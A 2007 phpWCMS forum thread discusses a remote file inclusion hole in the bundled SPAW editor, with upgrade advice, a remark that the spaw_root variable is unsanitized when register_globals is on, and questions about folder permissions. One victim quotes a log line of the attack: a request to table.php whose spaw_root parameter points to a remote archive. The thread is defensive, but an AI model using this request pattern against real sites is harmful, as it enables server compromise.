Page 1 of 1
SPAW Vulnerability
Posted: Tue 19. Jun 2007, 01:13
by Peekay
Apparently, Spaw version 1.0. has a vulnerability, specifically involving 'spaw_control.class.php'. According to Secunia, the issue is resolved by upgrading Spaw to version > 1.0.4.
http://secunia.com/advisories/10451/
and Solmetra (the makers of Spaw) recommend upgrading to at least 1.2.4., the current version being 2.0.4.1.
Posted: Tue 19. Jun 2007, 02:43
by DeXXus
"/include/inc_ext/spaw2/spaw.inc.php"
SPAW Editor v.2
Posted: Tue 19. Jun 2007, 10:46
by Peekay
This is relevent to those still using PHPWCMS 1.28 or earlier, which included Spaw 1.0.
Posted: Tue 19. Jun 2007, 13:17
by DeXXus
You're right, of course!
It would ~seem~ that, unless they are sharp, it would be tough for most folks to implement the new version AND add the "phpWCMS-specific" customization.
Posted: Tue 19. Jun 2007, 21:46
by Peekay
Thx DeXXus.
Could you give a considered opinion on this phpmailer issue too?
http://www.phpwcms.de/forum/viewtopic.php?t=15053
It may also be insignificant, but I was alerted to it and the class file is present in 1.2.8 and earlier.
Posted: Sun 24. Jun 2007, 16:58
by sebby
Hello,
This thread should most definitely be moved to the Security alert forum as many others out there (that are also using spaw as a third party product) have already been hit through that vulnerability.
Regards,
Posted: Fri 7. Sep 2007, 17:32
by 1996 328ti
The last time I upgraded I lost the some of my RTs so I am still on an older version.
What is SPAW used for?
Posted: Sat 8. Sep 2007, 02:35
by Pappnase
hello
spaw is only an wysiwyg editor so if you use the fck editor you can delete the spaw folder.
Posted: Sat 8. Sep 2007, 03:26
by 1996 328ti
Pappnase wrote:hello
spaw is only an wysiwyg editor so if you use the fck editor you can delete the spaw folder.
Thanks. I'll delete it them.
Whoever hacked into my site placed this in my spaw directory.
include/inc_ext/spaw/dialogs/table.php?spaw_root=http://----.org/coo2.zip? HTTP/1.1" 200 1203364
Posted: Sat 8. Sep 2007, 07:48
by Pappnase
hello
as far as i know could this only happen if you setup the wrong rights to the folders.
Posted: Sat 8. Sep 2007, 09:26
by DeXXus
Pappnase wrote:hello
as far as i know could this only happen if you setup the wrong rights to the folders.
Just an additional possible vulnerability:
The OLD vulnerability (phpWCMS v1.26) was also something to do with
register_globals:
Exploit:
~~~~~
Variable $spaw_root not sanitized. When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.
Solution :
~~~~~~~
declare variable $spaw_root
Posted: Sat 8. Sep 2007, 10:21
by Pappnase
ahhh
sorry dex
lucky to have sombody who's watching me
Posted: Sat 8. Sep 2007, 11:23
by DeXXus
Pappnase wrote:ahhh
sorry dex
lucky to have sombody who's watching me
@Pappnase
HeHe, even a "superhero" like you cannot remember everything!
-=U ROCK=-
We need to CLONE you!
Posted: Sat 8. Sep 2007, 11:41
by Pappnase
DeXXus wrote:Pappnase wrote:ahhh
sorry dex
lucky to have sombody who's watching me
@Pappnase
HeHe, even a "superhero" like you cannot remember everything!
-=U ROCK=-
We need to CLONE you!
he dex
if you would be an woman i would give you a kiss. but now you get only an beer
Posted: Sun 9. Sep 2007, 21:48
by 1996 328ti
Pappnase wrote:hello
as far as i know could this only happen if you setup the wrong rights to the folders.
I'm going over permissions since I've installed this so long ago. What should /includes and /images be set to?